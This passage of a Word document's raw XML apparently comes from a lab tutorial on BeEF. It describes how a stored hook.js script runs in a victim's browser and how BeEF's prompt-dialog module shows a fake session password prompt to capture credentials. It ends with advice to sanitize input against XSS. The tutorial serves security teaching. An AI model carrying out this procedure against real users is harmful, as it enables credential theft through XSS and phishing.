                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidP="7E815BD3" w:rsidRDefault="00000000" w14:paraId="27AB9B2D" w14:textId="77777777" w14:noSpellErr="1">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 8. Now what happens is that the script of hook.js(malicious script which was stored on the server) will run on the victim’s browser and you will be able to see the ip address of the victim in the BeEF control panel stating the victim’s ip as </w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>192.168.118.1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidRDefault="00000000" w14:paraId="7D6CDEF1" w14:textId="77777777">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="2C736C17" wp14:editId="63067529">
            <wp:extent cx="5943600" cy="35306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943600" cy="3530600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidRDefault="00113297" w14:paraId="54B1BC56" w14:textId="77777777"/>
    <w:p w:rsidR="00113297" w:rsidRDefault="00000000" w14:paraId="41930197" w14:textId="77777777" w14:noSpellErr="1">
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 9. Click on the victim’s ip. Now go to the commands section. Click on the browser folder.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidRDefault="00000000" w14:paraId="3FB0C93C" w14:textId="67685014">
      <w:r>
        <w:t xml:space="preserve">Click on Create Prompt Dialog. Write the prompt </w:t>
      </w:r>
      <w:r w:rsidR="00AC4A32">
        <w:t>text:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Enter password for resuming the session</w:t>
      </w:r>
      <w:r>
        <w:t>. Now click on Execute.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidRDefault="00000000" w14:paraId="7C24D24B" w14:textId="77777777">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="09C998B0" wp14:editId="15F355E8">
            <wp:extent cx="6553200" cy="3195638"/>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6553200" cy="3195638"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidP="7E815BD3" w:rsidRDefault="00000000" w14:paraId="2BA47CBC" w14:textId="0181FBA9" w14:noSpellErr="1">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 10. A dialog box will open up in the victim’s </w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>browser. It</w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is possible that the victim trusts this website and can be tricked into writing his password which is </w:t>
      </w:r>
      <w:r w:rsidRPr="7E815BD3" w:rsidR="7E815BD3">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“password123”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidRDefault="00113297" w14:paraId="60520AF1" w14:textId="77777777"/>
    <w:p w:rsidR="00113297" w:rsidRDefault="00000000" w14:paraId="467AA6CD" w14:textId="77777777">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="33336113" wp14:editId="551FEDCB">
            <wp:extent cx="5943600" cy="35814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43600" cy="3581400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidRDefault="00000000" w14:paraId="6A5DEBD9" w14:textId="77777777">
      <w:r>
        <w:t>Step 11. Now go to the control panel and see the module results history of that command. Click on the very first entry and see the results.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidRDefault="00113297" w14:paraId="302DDAD2" w14:textId="77777777"/>
    <w:p w:rsidR="00113297" w:rsidRDefault="00000000" w14:paraId="6A306ED9" w14:textId="77777777">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="44F2610F" wp14:editId="21824DE6">
            <wp:extent cx="2381250" cy="108585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381250" cy="1085850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidRDefault="00113297" w14:paraId="5F195C63" w14:textId="77777777"/>
    <w:p w:rsidR="00113297" w:rsidRDefault="00AC4A32" w14:paraId="6AFA2ED5" w14:textId="5E16C7FA">
      <w:r w:rsidRPr="77B7B333" w:rsidR="77B7B333">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Congratulatio</w:t>
      </w:r>
      <w:r w:rsidRPr="77B7B333" w:rsidR="77B7B333">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ns!</w:t>
      </w:r>
      <w:r w:rsidRPr="77B7B333" w:rsidR="77B7B333">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">! </w:t>
      </w:r>
      <w:r w:rsidRPr="77B7B333" w:rsidR="77B7B333">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We were suc</w:t>
      </w:r>
      <w:r w:rsidRPr="77B7B333" w:rsidR="77B7B333">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">cessful in capturing the password of the victim. Now there are many modules which we can execute by looking into the </w:t>
      </w:r>
      <w:r w:rsidRPr="77B7B333" w:rsidR="77B7B333">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>commands</w:t>
      </w:r>
      <w:r w:rsidRPr="77B7B333" w:rsidR="77B7B333">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> sections. We can see how powerful this </w:t>
      </w:r>
      <w:r w:rsidRPr="77B7B333" w:rsidR="77B7B333">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BeEF</w:t>
      </w:r>
      <w:r w:rsidRPr="77B7B333" w:rsidR="77B7B333">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is if your website is vulnerable to XSS. So, we should always try to sanitize our input fields to make sure no malicious code can run on our site.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00113297" w:rsidRDefault="00113297" w14:paraId="1AE39EA9" w14:textId="77777777"/>
    <w:p w:rsidR="00113297" w:rsidRDefault="00113297" w14:paraId="294A87D9" w14:textId="77777777"/>
    <w:sectPr w:rsidR="00113297">
      <w:pgSz w:w="12240" w:h="15840" w:orient="portrait"/>
      <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
      <w:pgNumType w:start="1"/>
      <w:cols w:space="72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int2:observations>
    <int2:textHash int2:hashCode="G1e77J40hNZnjB" int2:id="KDSam16C">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63F1726"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A876226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887300109">
    <w:abstractNumId w:val="0"/>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3297"/>
    <w:rsid w:val="00086F66"/>
    <w:rsid w:val="000E5404"/>
    <w:rsid w:val="00113297"/>
    <w:rsid w:val="0023679A"/>
    <w:rsid w:val="00441EC8"/>
    <w:rsid w:val="00526DCC"/>
    <w:rsid w:val="007854DA"/>
    <w:rsid w:val="00964C7E"/>
    <w:rsid w:val="00AC4A32"/>
    <w:rsid w:val="0AA97EBC"/>
    <w:rsid w:val="335F8D20"/>
    <w:rsid w:val="4FECA3D6"/>
    <w:rsid w:val="77B7B333"/>
    <w:rsid w:val="7E815BD3"/>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DA455"/>
  <w15:docId w15:val="{60F6E752-81E1-4984-8134-B01EAA7AC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fontTable" Target="fontTable.xml" Id="rId1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6.png" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"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microsoft.com/office/2011/relationships/people" Target="people.xml" Id="R3f4c45f3eca642c2" /><Relationship Type="http://schemas.microsoft.com/office/2011/relationships/commentsExtended" Target="commentsExtended.xml" Id="Ra114e9e0c7c04752" /><Relationship Type="http://schemas.microsoft.com/office/2016/09/relationships/commentsIds" Target="commentsIds.xml" Id="R1d7817693569471d" /><Relationship Type="http://schemas.microsoft.com/office/2020/10/relationships/intelligence" Target="intelligence2.xml" Id="R3cdb7f09d9814a4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Ashish Rawat</dc:creator>
  <lastModifiedBy>Ashish Rawat</lastModifiedBy>
  <revision>14</revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-05T05:13:00.0000000Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-10T13:08:13.0634965Z</dcterms:modified>
</coreProperties>
</file>